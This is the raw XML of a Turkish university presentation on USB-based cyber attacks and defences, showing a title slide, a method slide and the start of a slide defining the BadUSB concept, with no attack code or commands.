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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId27"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="348" r:id="rId3"/>
    <p:sldId id="447" r:id="rId4"/>
    <p:sldId id="367" r:id="rId5"/>
    <p:sldId id="368" r:id="rId6"/>
    <p:sldId id="448" r:id="rId7"/>
    <p:sldId id="358" r:id="rId8"/>
    <p:sldId id="449" r:id="rId9"/>
    <p:sldId id="450" r:id="rId10"/>
    <p:sldId id="451" r:id="rId11"/>
    <p:sldId id="452" r:id="rId12"/>
    <p:sldId id="453" r:id="rId13"/>
    <p:sldId id="454" r:id="rId14"/>
    <p:sldId id="457" r:id="rId15"/>
    <p:sldId id="458" r:id="rId16"/>
    <p:sldId id="459" r:id="rId17"/>
    <p:sldId id="460" r:id="rId18"/>
    <p:sldId id="467" r:id="rId19"/>
    <p:sldId id="463" r:id="rId20"/>
    <p:sldId id="468" r:id="rId21"/>
    <p:sldId id="464" r:id="rId22"/>
    <p:sldId id="465" r:id="rId23"/>
    <p:sldId id="466" r:id="rId24"/>
    <p:sldId id="4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MAL KARAÇUHA" initials="KK" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-4081392288-656860408-237611754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varScale="1">
        <p:scale>
          <a:sx n="67" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="692" y="40"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="-27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2A7C45-8D73-4357-8755-B8C3CF5FE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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB0D04F-44DD-4C2C-8117-09D1A4CD87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AD2A0C-89F2-43F7-83E3-1EE62B523915}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>20.03.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E88FDF24-FD8A-4EC1-83E5-7E4D4F2856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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C0DE7FA-89C4-4309-B6AD-9A76BC1A0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DFB0C-B485-499A-9590-E27B58230EB7}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173807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AF08-C8B1-48E5-9915-1D6A0B6BEDAD}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>20.03.2023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AA53E-2AB2-465F-BAC3-51942FA1F8F6}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64464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7B3034-9896-409C-926C-23BF863A3A3F}"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190194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171292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203876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449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287117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7B3034-9896-409C-926C-23BF863A3A3F}"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934264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7B3034-9896-409C-926C-23BF863A3A3F}"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311473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B3034-9896-409C-926C-23BF863A3A3F}"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678357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B3034-9896-409C-926C-23BF863A3A3F}"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251523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B3034-9896-409C-926C-23BF863A3A3F}"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21399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B3034-9896-409C-926C-23BF863A3A3F}"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39846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157594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B3034-9896-409C-926C-23BF863A3A3F}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>20.03.2023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419820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B3034-9896-409C-926C-23BF863A3A3F}"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179645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B3034-9896-409C-926C-23BF863A3A3F}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>20.03.2023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2805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340215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B3034-9896-409C-926C-23BF863A3A3F}"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6F93F6-F03C-483B-A5DF-658245D7E88D}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164833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7B3034-9896-409C-926C-23BF863A3A3F}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>20.03.2023</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6F93F6-F03C-483B-A5DF-658245D7E88D}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22628391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0C07AD-4AA2-4E64-936B-904085B60120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7400925" y="5221816"/>
            <a:ext cx="4543425" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0"/>
              <a:t>Kemal KARAÇUHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0"/>
              <a:t>Prof. Dr. Kemal BIÇAKCI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" i="1" dirty="0"/>
              <a:t>İstanbul Teknik Üniversitesi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" i="1" dirty="0"/>
              <a:t>Bilişim Enstitüsü</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" i="1" dirty="0"/>
              <a:t>Bilgi Güvenliği Mühendisliği ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1200" i="1" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1200" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{671BE144-F2D0-46EE-B8B6-41979A14E572}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919119" y="2325158"/>
            <a:ext cx="10353761" cy="132632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i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üzerİnden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sİber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>savunma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yöntemlerİNİn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>İncelenmesİ</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" i="1" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266124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B61A5C6-B24B-4635-888F-5721CA46D84B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Yöntem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1D1FC9-2D22-4D0C-B9B3-B28C0F945409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Yapılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalışmada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>araştırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>konusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>incelenmiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nasıl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerçekleştirileceğine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dair</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>örnek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalışmalar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapılmış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karşı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilinen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>savunma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yöntemleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>araştırılmıştır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89315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2B94EB3-A877-4C60-A3C2-62AC07F7B42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>BADUSB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>KAvramı</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A13DB530-8C6D-40E6-A8FB-21B5E1FA76FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096064"/>
            <a:ext cx="4894338" cy="4342836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>insan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arabirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gizlenmesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yerleşik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ürün</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açığına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olmasına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>verilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>addır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
